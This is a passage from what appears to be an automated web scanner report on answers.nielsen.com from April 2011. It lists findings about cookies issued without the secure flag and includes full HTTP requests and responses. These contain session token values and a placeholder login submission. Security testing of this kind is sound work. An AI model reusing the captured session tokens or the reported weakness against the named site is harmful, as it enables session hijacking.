The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gateway/authValidation.htm HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; answers_cookie=R907182360; USER_EMAIL_REJECT=Client ID

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:32 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Location: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Set-Cookie: GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 447

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://answers.nielsen.com/gateway
...[SNIP]...

2.2. https://answers.nielsen.com/gateway/forgottenPassword.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/forgottenPassword.htm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gateway/forgottenPassword.htm HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:42 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14488


<html>
   <head>
       <title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size:
...[SNIP]...

2.3. https://answers.nielsen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:29:45 GMT
Server: Apache
Cache-Control: no-store
Location: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2f
Content-Length: 485
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://answers.nielsen.com/gateway/logon.htm?T
...[SNIP]...

2.4. https://answers.nielsen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:44 GMT
Server: Apache
Last-Modified: Mon, 10 May 2010 13:49:22 GMT
ETag: "94462-47e-4863dad17fc80"
Accept-Ranges: bytes
Content-Length: 1150
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/x-icon

............ .h.......(....... ..... .......................................................e...W...a........................................D..u...]...v...~...........t...K........<..................
...[SNIP]...

2.5. https://answers.nielsen.com/gateway/forms/login.fcc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/forms/login.fcc

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /gateway/forms/login.fcc HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Content-Length: 179
Cache-Control: max-age=0
Origin: http://www.nielsen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118

clienlogininput=Client+ID&clientloginpwd=password&USER=Client+ID&PASSWORD=password&partner=&realm=&target=https%3A%2F%2Fanswers.nielsen.com%2Fportal%2Fsite%2Fanswers&submit=submit

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:30 GMT
Server: Apache
Set-Cookie: USER_EMAIL_REJECT=Client ID; path=/; domain=.nielsen.com
Cache-Control: no-store
Location: /gateway/authValidation.htm
Content-Length: 211
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/gateway/authValidation.htm">here</a>.</p>
</bo
...[SNIP]...

2.6. https://answers.nielsen.com/gateway/images/answers_ui/acnimage.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/answers_ui/acnimage.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/answers_ui/acnimage.jpg HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/support/support.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:36:23 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 2510
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.............C.........................    ....................!........."$".$.......C.......................................................................9...."..............................
...[SNIP]...

2.7. https://answers.nielsen.com/gateway/images/answers_ui/bg_login.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/answers_ui/bg_login.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/answers_ui/bg_login.png HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 63634
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...{.................sBIT....|.d....    pHYs...t...t.k$......tEXtCreation Time.03/15/10<..>....tEXtSoftware.Adobe Fireworks CS4........prVWx...Ml.U...a.K...G.n-!....T.Zq.R@Bm..... .(=p..
...[SNIP]...

2.8. https://answers.nielsen.com/gateway/images/answers_ui/ni-chevron.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/answers_ui/ni-chevron.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/answers_ui/ni-chevron.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 64
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..    ................!.......,......    ....D0.ri..kR0..D9.8..;

2.9. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-bg1.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-bg1.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1028
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V........t.\ p.P.....t.s.(.........| .......... ...B....|t.`P.....
...[SNIP]...

2.10. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-bg2.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-bg2.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1230
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....$.....4...~.$..4...~.4..D..,..<......z.<...~.,..$......    \..D........ .........TQi.F.....bb.[[......|__..w.........V........t.\ w.P.....t.s.(.........| .......... ...B....|t.`P.....
...[SNIP]...

2.11. https://answers.nielsen.com/gateway/images/buttons/ni-btn-onblue-bg3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-onblue-bg3.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-onblue-bg3.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1026
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

2.12. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-or-bg1.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-or-bg1.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/forgottenPassword.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:46 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1028
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

2.13. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-or-bg2.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-or-bg2.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/forgottenPassword.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:46 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1230
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....$.....4...~.$..4...~.4..D..,..<......z.<...~.,..$......l.....]..`.....:.......Tf..#..]..`..........|..............V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

2.14. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-onblue-bg3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-or-onblue-bg3.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-or-onblue-bg3.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/forgottenPassword.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
